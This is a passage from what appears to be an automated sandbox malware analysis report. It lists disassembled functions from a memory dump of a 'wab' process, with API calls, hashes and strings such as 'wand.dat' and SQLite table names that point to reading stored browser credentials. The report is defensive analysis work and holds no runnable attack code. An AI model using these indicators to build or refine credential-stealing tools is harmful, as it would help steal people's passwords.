                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT ref: 0042EC7A
                                                              Strings
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 3023356884-0
                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                              Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 3023356884-0
                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                              Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                              • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                              Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 1171893557-0
                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                              Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                              Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                              • String ID:
                                                              • API String ID: 4284152360-0
                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                              Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                              Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                              • String ID:
                                                              • API String ID: 4284152360-0
                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
